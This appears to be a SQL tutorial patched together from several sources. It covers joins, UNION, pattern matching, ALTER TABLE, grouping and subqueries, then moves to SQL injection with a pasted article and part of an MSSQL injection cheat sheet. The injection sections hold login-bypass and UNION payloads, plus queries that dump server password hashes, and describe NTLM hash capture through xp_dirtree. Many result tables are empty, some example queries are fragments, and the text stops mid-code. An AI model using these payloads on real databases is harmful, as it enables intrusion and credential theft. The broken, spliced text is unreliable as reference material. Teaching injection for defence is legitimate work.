In a join query, the left table is the one that appears leftmost in the JOIN clause, and the right table is the
one that appears rightmost.
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
+--------+--------------+------------+-----------------+
As you can clearly see the left join includes all the rows from the employees table in the result set,
whether or not there is a match on the dept_id column in the departments table.
Note: If there is a row in the left table but no match in the right table, then the associated result row
contains NULL values for all columns coming from the right table.
The RIGHT JOIN is the exact opposite of the LEFT JOIN. It returns all rows from the right table along with
the rows from the left table for which the join condition is met.
Right join is a type of outer join, which is why it is also referred to as a right outer join. Other variations of outer
join are left join and full join.
Now, let's say you want to retrieve the names of all departments as well as the details of the employees
who work in each department. In a real situation, however, there may be some departments in which
no employee is currently working. Let's find out.
The following statement retrieves all the available departments as well as the id, name, and hiring date of the
employees who belong to each department by joining the employees and departments tables together
using the common dept_id field.
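A sketch of such a statement, reusing the column names and the t1/t2 aliases from the inner join example (the exact select list and ordering are assumed):

```sql
-- t1 = employees (left table), t2 = departments (right table).
-- Departments without employees are kept; the employee columns are NULL for them.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 RIGHT JOIN departments AS t2
ON t1.dept_id = t2.dept_id
ORDER BY dept_name;
```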
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
The right join includes all the rows from the departments table in the result set, whether or not there is a
match on the dept_id column in the employees table. As you can see, the department "Customer
Service" is included even though there is no employee in this department.
Note: If there is a row in the right table but no match in the left table, then the associated result row
contains NULL values for all columns coming from the left table.
Cross join
Cross joins are joins without a join condition. Each row of one table is combined with each row of another
table. This type of result set is called a Cartesian product or cross product. For example, a cross join
between the employees and departments tables yields a result set with one row for each possible
employees/departments combination.
A FULL JOIN returns all the rows from the joined tables, whether they are matched or not. In other words,
a full join combines the functions of a LEFT JOIN and a RIGHT JOIN. Full join is a type of outer join, which
is why it is also referred to as a full outer join.
Now, let's say you just want to retrieve the names of all the employees and the names of available
departments, regardless of whether they have corresponding rows in the other table. In that case you can
use a full join as demonstrated below.
The following statement retrieves all the departments as well as the details of all the employees by joining
the employees and departments tables together using the common dept_id field.
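A sketch of such a statement, reusing the column names and the t1/t2 aliases from the inner join example (the select list and ordering are assumed). It applies only to database systems that support FULL JOIN:

```sql
-- Keeps unmatched rows from both sides; missing columns are filled with NULL.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 FULL JOIN departments AS t2
ON t1.dept_id = t2.dept_id
ORDER BY emp_name;
```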
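Some databases, such as MySQL, do not support full joins. In that case you can use the UNION
ALL operator to combine the LEFT JOIN and RIGHT JOIN as follows. Note that UNION ALL keeps every row
from both queries, so rows that match in both joins appear twice; use UNION instead if you want each
matched row only once.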
ON t1.dept_id = t2.dept_id
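A complete form of this workaround might look like the following sketch, which assumes the same columns and t1/t2 aliases as the other join examples in this document:

```sql
-- Left join: all employees, with or without a department.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 LEFT JOIN departments AS t2
ON t1.dept_id = t2.dept_id
UNION ALL
-- Right join: all departments, with or without employees.
-- With UNION ALL, rows matched by both joins appear twice;
-- replace UNION ALL with UNION to remove those duplicates.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 RIGHT JOIN departments AS t2
ON t1.dept_id = t2.dept_id;
```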
SQL CROSS JOIN Operation
If you don't specify a join condition when joining two tables, the database system combines each row from the
first table with each row from the second table. This type of join is called a cross join or a Cartesian
product.
The number of rows in a cross join is the product of the number of rows in each table. Here's a simple
example of a cross join operation.
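A sketch of such a query, reusing the column names and the t1/t2 aliases from the other join examples (the select list is assumed):

```sql
-- No ON clause: every employees row is paired with every departments row.
SELECT t1.emp_id, t1.emp_name, t1.hire_date, t2.dept_name
FROM employees AS t1 CROSS JOIN departments AS t2;
```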
Tip: A cross join creates a Cartesian product or multiplication of all rows in one table with all rows in
another. So, for example, if one table has 5 rows and another has 10 rows, a cross-join query produces
50 rows, the product of 5 and 10.
After executing the above command, you get the result set something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
As you can see, a cross join is not as useful as the other joins that we've covered in the previous chapters.
Since the query didn't specify a join condition, each row from the employees table is combined with each
row from the departments table. Therefore, unless you are sure that you want a Cartesian product, don't
use a cross join.
Part 4: Union
UNION ALL
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
As you can see, the result includes all the rows from both the departments and employees tables.
When performing outer joins, wherever the DBMS (Database Management System) can't match any row,
it places NULL in the columns to indicate that the data does not exist.
The UNION operator is used to combine the results of two or more SELECT queries into a single result
set. The union operation is different from using joins that combine columns from two tables. The union
operation creates a new table by placing all rows from two source tables into a single result table, placing
the rows on top of one another.
These are the basic rules for combining the result sets of two SELECT queries by using UNION:
The number and the order of the columns must be the same in all queries.
The data types of the corresponding columns must be compatible.
Syntax
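The general form can be sketched as follows, where column_list, table1_name and table2_name are placeholders:

```sql
-- Both SELECT lists must have the same number of columns, in the same order.
SELECT column_list FROM table1_name
UNION
SELECT column_list FROM table2_name;
```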
To understand the union operation better, let's assume that some hypothetical fields, like
first_name and last_name, exist in our employees and customers tables. Please note that these fields do
not actually exist in our demo database tables.
+----+------------+-----------+--------+
+----+------------+-----------+--------+
| 1 | Ethan | Hunt | 5000 |
+----+------------+-----------+--------+
Table: employees
+----+------------+-----------+----------+
+----+------------+-----------+----------+
+----+------------+-----------+----------+
Table: customers
The following statement returns the first and last names of all the customers and employees:
SELECT first_name, last_name FROM employees UNION
SELECT first_name, last_name FROM customers;
+---------------+--------------+
| first_name    | last_name    |
+---------------+--------------+
| Ethan         | Hunt         |
| Tony          | Montana      |
| Sarah         | Connor       |
| Rick          | Deckard      |
| Martin        | Blank        |
| Maria         | Anders       |
| Fran          | Wilson       |
| Dominique     | Perrier      |
| Thomas        | Hardy        |
+---------------+--------------+
By default, the UNION operation eliminates duplicate rows from the combined result set. That's why
the above query returns only 9 rows: the name "Martin Blank" appears in both the
employees and customers tables.
However, if you want to keep the duplicate rows you can use the ALL keyword, as follows:
SELECT first_name, last_name FROM employees UNION ALL
SELECT first_name, last_name FROM customers;
Pattern Matching
So far, you've seen conditions that identify an exact string, e.g. WHERE name='Lois Lane'. But in
SQL you can also perform partial or pattern matching using the LIKE operator.
The LIKE operator provides a measure of pattern matching by allowing you to specify wildcards for one or
more characters. You can use the following two wildcard characters:
The percent sign (%): matches any number of characters, even zero characters.
The underscore (_): matches exactly one character.
Here are some examples that show how to use the LIKE operator with wildcards.
Suppose we have an employees table in our database with the following records:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
Now, let's say you want to find all the employees whose name begins with the letter S.
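A sketch of such a query, assuming the employee's name is stored in the emp_name column used in the join examples:

```sql
-- 'S%' matches any value that starts with S, followed by zero or more characters.
-- emp_name is an assumed column name for this table.
SELECT * FROM employees WHERE emp_name LIKE 'S%';
```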
After executing the query, you'll get the output something like this:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
In MySQL, nonbinary string (CHAR, VARCHAR, TEXT) comparisons are case-insensitive by default,
whereas binary string (BINARY, VARBINARY, BLOB) comparisons are case-sensitive.
This means that if you search with WHERE name LIKE 'S%', you get all column values that start with S or
s (as you can see, we've got both "Sarah" and "simons"). However, if you want to make this search
case-sensitive, you can use the BINARY operator as follows:
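A sketch of the case-sensitive variant in MySQL, again assuming the name is stored in an emp_name column:

```sql
-- BINARY forces a byte-by-byte comparison, so 'S%' no longer matches a lowercase s.
-- emp_name is an assumed column name for this table.
SELECT * FROM employees WHERE BINARY emp_name LIKE 'S%';
```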
Now, this statement will return only those employees whose name starts with a capital S:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
If you want a column always to be treated in case-sensitive fashion, declare it with a case sensitive or
binary collation to avoid any performance issue.
Partial matches are useful when you don't know the exact form of the string for which you're searching.
You can also use partial matching to retrieve multiple rows that contain similar strings in one of the table's
columns.
Part 6: SQL ALTER TABLE Statement
It is quite possible that after creating a table, as you start using it, you discover that you forgot to
include a column or constraint, or specified a wrong name for a column.
In such a situation you can use the ALTER TABLE statement to alter or change an existing table by adding,
changing, or deleting a column in the table.
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
We'll use this shippers table for all of our ALTER TABLE statements.
Now suppose that we want to expand the existing shippers table by adding one more column. But, the
question is how we can do this using SQL commands? Well let's find out.
Adding a New Column
The basic syntax for adding a new column to an existing table can be given with:
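The general form can be sketched as follows. The second statement is a hypothetical example; the fax column and its data type are assumptions made for illustration:

```sql
-- General form: table_name, column_name, data_type and constraints are placeholders.
ALTER TABLE table_name ADD column_name data_type constraints;

-- Hypothetical example: add a fax column to the shippers table.
ALTER TABLE shippers ADD fax VARCHAR(20);
```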
Now, after executing the above statement, if you view the table structure using the command
DESCRIBE shippers; on the MySQL command line, it looks as follows:
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
If you want to add a NOT NULL column to an existing table then you must specify an explicit default
value. This default value is used to populate the new column for every row that already exists in your
table.
When adding a new column to the table, if neither NULL nor NOT NULL is specified, the column is treated
as though NULL had been specified.
If you've already created a table but are unhappy with the existing column position within the table, you can
change it at any time using the following syntax:
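In MySQL, a column can be repositioned with MODIFY and the AFTER keyword. The sketch below uses placeholder names throughout:

```sql
-- MySQL syntax: column_definition must repeat the column's full definition
-- (data type and any attributes); existing_column is the column to place it after.
ALTER TABLE table_name
MODIFY column_name column_definition AFTER existing_column;
```

Other database systems may not support changing the column position this way.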
Our current shippers table has one major problem. If you insert records with duplicate phone numbers,
nothing stops you from doing that, which is not good; phone numbers should be unique.
You can fix this by adding a constraint UNIQUE to the phone column. The basic syntax for adding this
constraint to existing table columns can be given with:
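The general form, followed by the statement for the phone column of the shippers table, can be sketched as:

```sql
-- General form: table_name and column_name are placeholders.
ALTER TABLE table_name ADD UNIQUE (column_name, ...);

-- Applied to the phone column of the shippers table.
ALTER TABLE shippers ADD UNIQUE (phone);
```

The statement fails if the column already contains duplicate values, so those need to be cleaned up first.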
Similarly, if you've created a table without a PRIMARY KEY, you can add one with:
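The general form can be sketched as follows, with placeholder names:

```sql
-- table_name and column_name are placeholders; list one or more columns.
ALTER TABLE table_name ADD PRIMARY KEY (column_name, ...);
```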
Removing Columns
The basic syntax for removing a column from an existing table can be given with:
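The general form can be sketched as follows. The second statement is a hypothetical example; the fax column is an assumption made for illustration:

```sql
-- General form: table_name and column_name are placeholders.
ALTER TABLE table_name DROP COLUMN column_name;

-- Hypothetical example: remove a fax column from the shippers table.
ALTER TABLE shippers DROP COLUMN fax;
```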
Now, after executing the above statement, if you view the table structure, it looks as follows:
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
You can modify the data type of a column in SQL Server by using the ALTER clause, as follows:
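The general forms can be sketched as follows, with placeholder names. The MySQL variant is added for comparison, since this document mostly uses MySQL:

```sql
-- SQL Server: change the data type of an existing column.
ALTER TABLE table_name ALTER COLUMN column_name new_data_type;

-- MySQL equivalent: uses MODIFY instead of ALTER COLUMN.
ALTER TABLE table_name MODIFY column_name new_data_type;
```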
Renaming Tables
The basic syntax for renaming an existing table in MySQL can be given with:
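In MySQL, either of the following forms can be used; the table names are placeholders:

```sql
-- Rename through ALTER TABLE.
ALTER TABLE current_table_name RENAME new_table_name;

-- Equivalent standalone statement.
RENAME TABLE current_table_name TO new_table_name;
```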
When multiple tables are being joined in a single query, you need to prefix each column name with the
name of the table it belongs to, like employees.dept_id, departments.dept_id, etc., in order to avoid
confusion and ambiguous column errors in case columns in different tables have the same name. But if
table names are long and appear several times in the query, then writing the query becomes a
difficult and annoying task.
So to save time and avoid writing the complete table names, you can give each table a short alias name
and refer to its columns using that alias name in the query.
Here's a query that retrieves the employee's id, name and their department name by joining the
employees and departments tables together using the common dept_id field.
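A sketch of such a query written with full table names. The join type is an assumption; a left join is used here so that employees without a department are also listed:

```sql
-- Every column is prefixed with its full table name.
SELECT employees.emp_id, employees.emp_name, departments.dept_name
FROM employees LEFT JOIN departments
ON employees.dept_id = departments.dept_id
ORDER BY emp_id;
```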
Here's the compact version of the previous query that uses table aliases:
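A sketch of the alias-based form, assuming a left join on dept_id and the aliases t1 and t2 used elsewhere in this document:

```sql
-- t1 stands for employees, t2 for departments.
SELECT t1.emp_id, t1.emp_name, t2.dept_name
FROM employees AS t1 LEFT JOIN departments AS t2
ON t1.dept_id = t2.dept_id
ORDER BY emp_id;
```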
If you execute either of these statements, you'll get the same output, as follows:
+--------+-----------------+--------------------+
+--------+-----------------+--------------------+
+--------+-----------------+--------------------+
As you can see, table aliases save a lot of typing.
Defining Aliases for Table Columns
Consider the following query in which we've used an expression to reformat the dates in the hire_date
column for generating a custom output:
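A sketch of such a query in MySQL. The DATE_FORMAT format string is an assumption chosen for illustration; any formatting expression would produce a similarly long column label:

```sql
-- Without an alias, the result column is labelled with the whole expression text.
-- The format string '%M %e, %Y' (e.g. month name, day, year) is assumed.
SELECT emp_name, DATE_FORMAT(hire_date, '%M %e, %Y')
FROM employees;
```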
If you execute the above statement, you'll get the output something like this:
+--------------+-------------------------------------+
+--------------+-------------------------------------+
+--------------+-------------------------------------+
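As you can see, the label of the last column in our output is long and unwieldy. We can fix this problem using
a column alias, as follows (the DATE_FORMAT expression is an assumed reconstruction of the elided part of the query):
SELECT emp_name, DATE_FORMAT(hire_date, '%M %e, %Y') AS hire_date
FROM employees;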
+--------------+------------------+
| emp_name     | hire_date        |
+--------------+------------------+
+--------------+------------------+
You can use the alias in GROUP BY, ORDER BY, or HAVING clauses to refer to the column. However,
aliases are not allowed in a WHERE clause.
Grouping Rows
The GROUP BY clause is used in conjunction with the SELECT statement and aggregate functions to
group rows together by common column values.
Now, let's say that instead of finding just the names of the employees and their departments, you want to find out
the total number of employees in every department.
For small tables you can simply apply a left join and count the employees by hand, but
if a table contains thousands of employees, that is not practical.
In this situation you can use the GROUP BY clause with the SELECT statement, like this:
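SELECT t1.dept_name, COUNT(t2.emp_id) AS total_employees
FROM departments AS t1 LEFT JOIN employees AS t2
ON t1.dept_id = t2.dept_id
GROUP BY t1.dept_name;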
If you execute the above statement, you'll get the output something like this:
+-------------------+-----------------+
| dept_name         | total_employees |
+-------------------+-----------------+
| Administration    |               1 |
| Customer Service  |               0 |
| Finance           |               1 |
| Human Resources   |               1 |
| Sales             |               1 |
+-------------------+-----------------+
In the next chapter you'll learn how to specify a search condition for a group or an aggregate using the
HAVING clause with the GROUP BY clause.
The GROUP BY clause must appear after the FROM and WHERE clauses, and before the ORDER BY in
a SQL SELECT statement.
Part 9: SQL HAVING Clause
The HAVING clause is typically used with the GROUP BY clause to specify a filter condition for a group or
an aggregate. The HAVING clause can only be used with the SELECT statement.
Now, let's say that instead of finding just the names of the employees and their departments, you want to find out
the names of those departments in which there are no employees.
For small tables you can simply apply a left join and check each department manually, but
if a table contains thousands of employees, that is not practical.
In this situation you can use the HAVING clause with the GROUP BY clause, like this:
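SELECT t1.dept_name, COUNT(t2.emp_id) AS total_employees
FROM departments AS t1 LEFT JOIN employees AS t2
ON t1.dept_id = t2.dept_id
GROUP BY t1.dept_name
HAVING total_employees = 0;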
If you execute the above statement, you'll get the output something like this:
+------------------+-----------------+
| dept_name        | total_employees |
+------------------+-----------------+
| Customer Service |               0 |
+------------------+-----------------+
A HAVING clause is similar to a WHERE clause, but applies only to groups as a whole, whereas the
WHERE clause applies to individual rows.
A SELECT query can contain both a WHERE and a HAVING clause, but in that case the WHERE clause
must appear before the GROUP BY clause, whereas the HAVING clause must appear after it but before
the ORDER BY clause.
Part 10: Further Reading
SQL Subqueries
What Is a Subquery?
A subquery, also known as a nested query or subselect, is a SELECT query embedded within the
WHERE or HAVING clause of another SQL query. The data returned by the subquery is used by the
outer statement in the same way a literal value would be used.
Subqueries provide an easy and efficient way to handle queries that depend on the results of
another query. They are almost identical to normal SELECT statements, but there are a few restrictions.
The most important ones are listed below:
A subquery must return only one column. This means you cannot use SELECT * in a subquery unless the
table you are referring to has only one column. You may use a subquery that returns multiple columns if the
purpose is row comparison.
You can only use subqueries that return more than one row with multiple value operators, such as the IN
or NOT IN operator.
Subqueries are most frequently used with the SELECT statement; however, you can use them within an
INSERT, UPDATE, or DELETE statement as well, or inside another subquery.
The following statement will return the details of only those customers whose order value in the orders
table is more than 5000 dollars. Also note that we've used the keyword DISTINCT in our subquery to
eliminate the duplicate cust_id values from the result set.
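A sketch of such a statement. The cust_id column and the customers and orders tables come from the text; the order_value column name is an assumption made for illustration:

```sql
-- The inner query collects the ids of customers with at least one large order;
-- the outer query returns the full customer rows for those ids.
-- order_value is an assumed column name.
SELECT * FROM customers
WHERE cust_id IN (SELECT DISTINCT cust_id
                  FROM orders
                  WHERE order_value > 5000);
```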
A subquery can return a single value, a single row, a single column, or a table containing one or more
rows of one or more columns.
Note: A subquery can be nested inside the WHERE or HAVING clause of an outer SELECT, INSERT,
UPDATE, or DELETE statement, or inside another subquery.
Subqueries with the INSERT Statement
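A sketch of an INSERT that takes its rows from a subquery. It assumes that premium_customers has the same column layout as customers and that the order amount is stored in a column named order_value; both are assumptions made for illustration:

```sql
-- Copies every customer with an order above 5000 into premium_customers.
-- order_value is an assumed column name.
INSERT INTO premium_customers
SELECT * FROM customers
WHERE cust_id IN (SELECT DISTINCT cust_id
                  FROM orders
                  WHERE order_value > 5000);
```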
The above statement will insert the records of premium customers into a table called
premium_customers, by using the data returned from the subquery. Here the premium customers are the
customers who have placed orders worth more than 5000 dollars.
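You can also use subqueries in conjunction with the UPDATE statement to update a single column or
multiple columns in a table, as follows (the column names order_value and postal_code are assumed here for illustration):
UPDATE orders SET order_value = order_value + 10
WHERE cust_id IN (SELECT cust_id FROM customers WHERE postal_code = 75016);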
The above statement will update the order value in the orders table for those customers who live in the
area whose postal code is 75016, by increasing the current order value by 10 dollars.
Similarly, you can use subqueries in conjunction with the DELETE statement to delete a single row or
multiple rows in a table, as follows:
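A sketch of a DELETE driven by a subquery. The postal_code column name and the choice of filter are assumptions made for illustration:

```sql
-- Deletes the orders of every customer living in postal code 75016.
-- postal_code is an assumed column name.
DELETE FROM orders
WHERE cust_id IN (SELECT cust_id
                  FROM customers
                  WHERE postal_code = 75016);
```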
Consider the following SQL statement which is a simple example of authenticating a user with a
username and password in a web application.
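Such a statement might look like the following sketch, where the users table comes from the text and the username and password column names are assumed:

```sql
-- username_val and password_val stand for the raw values typed by the user;
-- the application pastes them directly into the query text.
SELECT * FROM users WHERE username='username_val' AND password='password_val';
```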
Here, username_val and password_val represent the username and password entered by the user,
respectively. If a user enters values such as "john" as the username and "123" as the password, then the
resulting statement will be:
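With those values substituted, the statement would read as follows (the username and password column names are assumed):

```sql
-- Normal case: returns a row only if both values match a stored user.
SELECT * FROM users WHERE username='john' AND password='123';
```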
But suppose the user is an attacker who, instead of entering a valid username and password in the input
fields, enters a value such as: ' OR 'x'='x
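If that value is pasted into both fields, the resulting statement would read as follows (the username and password column names are assumed):

```sql
-- The injected quotes close the string literals early, and the trailing
-- OR 'x'='x' makes the WHERE condition true for every row.
SELECT * FROM users WHERE username='' OR 'x'='x' AND password='' OR 'x'='x';
```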
This statement is a valid SQL statement, and since WHERE 'x'='x' is always true, the query will return all
rows from the users table. You can see how easily an attacker can get access to all the sensitive
information in a database with just a little dirty trick.
If the users table is quite large and contains millions of rows, this single statement can also lead to a
denial-of-service attack (DoS attack) by overloading the system resources and making your application
unavailable to legitimate users.
Warning: The consequences of ignoring SQL injection vulnerability can be even worse if your script
generates a DELETE or UPDATE query. An attacker can delete data from the table or change all of its
rows permanently.
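Always validate user input and make no assumptions. Never build SQL statements directly from user
input. If you're using PHP and MySQL, you can use the mysqli_real_escape_string() function to create a
legal SQL string that you can use in an SQL statement. Prepared statements with bound parameters are
generally the more robust option, because the input is never parsed as SQL.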
Here's a very basic example of user authentication using PHP and MySQL that demonstrates how to
prevent SQL injection while taking input from users.
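As a language-neutral illustration of the same idea, here is a minimal sketch using Python's built-in sqlite3 module rather than PHP and MySQL. The users table, its two sample rows, and the function names login_unsafe and login_safe are hypothetical. Passwords are stored in plain text only to mirror the "john" / "123" example above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("john", "123"), ("mary", "abc")])

def login_unsafe(username, password):
    # Vulnerable: user input is pasted straight into the SQL text.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()

def login_safe(username, password):
    # Placeholders keep the input as data; it is never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

payload = "' OR 'x'='x"
print(login_unsafe(payload, payload))  # every user row comes back
print(login_safe(payload, payload))    # no row matches the literal text
```

With the payload in both fields, the concatenated query matches every row, while the parameterized query treats the payload as an ordinary (non-matching) string.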
Check This out: https://www.sqlshack.com/learn-sql-sql-injection/
SQL Injection is a well-known technique used to attack SQL-based applications. In this article,
we’ll focus on examples showing how you could exploit database vulnerabilities using this
technique, while in the next article we’ll talk about ways how you can protect your application
from such attacks.
Data Model
The main idea behind such attacks is to find the parts of the application that accept input
(usually text boxes on forms) and populate them with values crafted to do
what you want. These inserted values, when combined with the query in the background,
result in a query that does what you want and not what the application owner planned.
We’ll take a look at a few examples, which are all similar but differ in how
you exploit the application’s vulnerabilities.
In all our examples we’ll use dynamic SQL to simulate passing parameters to the query
(applications handle this in a similar way). The @sql variable contains the query without the
parameter and the @id variable contains the parameter value.
In the first query, I just wanted to show how dynamic SQL is declared and executed, so the first
query simply returns all rows from the customer table. No parameters are used in this query.
The second query uses the parameter @id, and the intention is that we pass only the id of the row
we want to return. Notice that this parameter is declared as a textual value, NVARCHAR(MAX).
This is because parameters are often passed as textual values. As expected, the second result
set returns only the row with the given id. So far, so good.
The third query is the interesting one. As a parameter we’ve passed ‘2 OR 1 = 1’. So, we have the
value related to the desired row, but we’ve added OR 1 = 1. This condition always holds, so
the whole WHERE condition is true for every row in the table and the query returns all rows
from the table.
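The effect of the second and third queries can be reproduced with a short sketch. It uses Python's sqlite3 module instead of T-SQL dynamic SQL, and the customer table columns and sample rows are assumptions made for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customer (id INTEGER PRIMARY KEY, customer_name TEXT)")
conn.executemany("INSERT INTO customer VALUES (?, ?)",
                 [(1, "Jewelry Store"), (2, "Bakery"), (3, "Cafe")])

def find_by_id(id_text):
    # Mimics the dynamic SQL in the text: the parameter is appended as text.
    sql = "SELECT id, customer_name FROM customer WHERE id = " + id_text
    return conn.execute(sql).fetchall()

one_row = find_by_id("2")            # the intended use
all_rows = find_by_id("2 OR 1 = 1")  # the injected condition is always true
print(one_row)
print(len(all_rows))
```

The first call returns the single requested row; the second returns the whole table, because the appended text became part of the WHERE clause.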
All of the data in the database are valuable to you, but for a potential hacker, the most
interesting data are your business data and the data related to your customers and application
users, whether they are company employees or customers.
If we’re talking about passwords, one of the best ways to protect them is to store them as
salted hash values. That way, even if someone gets access to these values, they won’t know the
original password.
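One possible way to store passwords as hashes is sketched below with Python's standard hashlib, hmac, and os modules. The function names and the iteration count are illustrative assumptions, not a recommendation from the article. A production system would normally rely on a maintained password-hashing library.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # illustrative work factor, not a recommendation

def hash_password(password, salt=None):
    # A fresh random salt makes equal passwords hash differently.
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, expected):
    _, digest = hash_password(password, salt)
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(digest, expected)

salt, stored = hash_password("123")
print(verify_password("123", salt, stored))
```

Only the salt and the digest would be stored in the users table; the original password is never written to the database.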
SQL Injection using UNION
Another common example of this technique is using UNION to combine two datasets. In that case,
the first dataset is probably not as interesting to us as the second one (pretty obvious,
because we’ve used UNION to add that set). Let’s see how this can be done.
The first query returns exactly what should have been returned, and the second query is the one
where malicious code has been used. Besides the parameter value, we’ve added a whole query:
‘2 UNION SELECT id, first_name + ' ' + last_name FROM employee’. This result set
contains one row from the customer table and all rows from the employee table.
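The UNION payload can be tried against a toy database. The sketch below again uses Python's sqlite3 module; the table layouts and sample names are assumptions, and SQLite concatenates strings with || where the T-SQL in the text uses +.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customer (id INTEGER PRIMARY KEY, customer_name TEXT);
    CREATE TABLE employee (id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
    INSERT INTO customer VALUES (1, 'Jewelry Store'), (2, 'Bakery');
    INSERT INTO employee VALUES (1, 'Ana', 'Kovac'), (2, 'Ivan', 'Horvat');
""")

def find_by_id(id_text):
    # Vulnerable on purpose: the parameter is appended to the query text.
    sql = "SELECT id, customer_name FROM customer WHERE id = " + id_text
    return conn.execute(sql).fetchall()

payload = "2 UNION SELECT id, first_name || ' ' || last_name FROM employee"
rows = find_by_id(payload)
print(rows)
```

The result mixes the one requested customer with every employee. The attack only needs the injected SELECT to return the same number of columns as the original query.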
We could simply be “mean” and try to confuse the database users. Other than that, we could
insert malicious values (e.g. create an admin account for ourselves) or add objects to the database
where we’ll store the results of actions generated by the code we’ve altered.
The first query returns exactly the desired customer. The second query, besides returning the
selected customer, also inserts a new record into the employee table. With the last query, I’ve
checked that the row had been inserted.
It seems that SQL injection is limited only by your imagination. And, of course, the security
implemented in the application.
Conclusion
In this article, we learned what SQL injection is and how it works. In the next article, we’ll talk
about how to prevent such attacks in your application. There are a few ways to do that, but
we’ll combine what we’ve learned so far in this series, including stored procedures and
functions, and see how to use that knowledge to prevent these attacks.
Visit the injection cheat sheet here:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection
MS SQL
MSSQL comments
MSSQL User
SELECT CURRENT_USER
MSSQL version
SELECT @@version
SELECT DB_NAME()
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name =
'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name='sometable'; -- list column names and types for master..sometable
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name='sometable'; -- list column names and types for master..sometable
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
(Need to convert to hex to return hashes in MSSQL error message / some version
of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from
master.sys.sql_logins
Executed by a different user than the one using xp_cmdshell to execute commands
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use
the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.
Manual exploitation
-- find link
select * from master..sysservers
Database management systems like SQL Server have to translate the SQL queries you give them into
the actual instructions they have to perform to read or change the data in the database. After processing,
the database engine then also attempts to automatically optimize the query where possible.
Query optimization is when a developer, or the database engine, changes a query in such a way that SQL
Server is able to return the same results more efficiently. Sometimes it's as simple as using EXISTS()
instead of COUNT(), but other times the query needs to be rewritten with a different approach.
Performance tuning includes query optimization, SQL client code optimization, database index
management, and in another sense, better coordination between developers and DBAs.
An index tracks a targeted subset of a table's data so that selecting and ordering can be done much
faster, without the server having to look through every last bit of data for that table.
EXISTS() stops processing as soon as it finds a matching row, whereas COUNT() has to count every row,
regardless of whether you actually need that detail in the end.
Imagine a scenario in which 1000 queries hammer your database in sequence. Something like:
cmd.ExecuteNonQuery();
}
You should avoid such loops in your code. For example, we could transform the above snippet by using a
single INSERT or UPDATE statement with multiple rows and values:
INSERT INTO TableName (A,B,C) SELECT 1,2,3 UNION ALL SELECT 4,5,6 -- SQL SERVER 2005
END
WHERE B in (1,2,3)
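The shape of this transformation can be sketched with Python's sqlite3 module. The table TableName with columns A, B, C follows the text, while the generated row values and the CASE replacement values are placeholders. SQLite runs in-process, so this shows the pattern rather than the network savings you would see against a database server.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE TableName (A INTEGER, B INTEGER, C INTEGER)")

rows = [(i, i + 1, i + 2) for i in range(1000)]

# Slow pattern: one statement (and one round trip) per row.
# for row in rows:
#     conn.execute("INSERT INTO TableName (A, B, C) VALUES (?, ?, ?)", row)

# Batched pattern: hand over all rows at once, inside one transaction.
with conn:
    conn.executemany("INSERT INTO TableName (A, B, C) VALUES (?, ?, ?)", rows)

# A single UPDATE with CASE replaces three separate UPDATE statements.
with conn:
    conn.execute("""
        UPDATE TableName
        SET A = CASE B WHEN 1 THEN 100 WHEN 2 THEN 200 WHEN 3 THEN 300 END
        WHERE B IN (1, 2, 3)
    """)

total = conn.execute("SELECT COUNT(*) FROM TableName").fetchone()[0]
changed = conn.execute(
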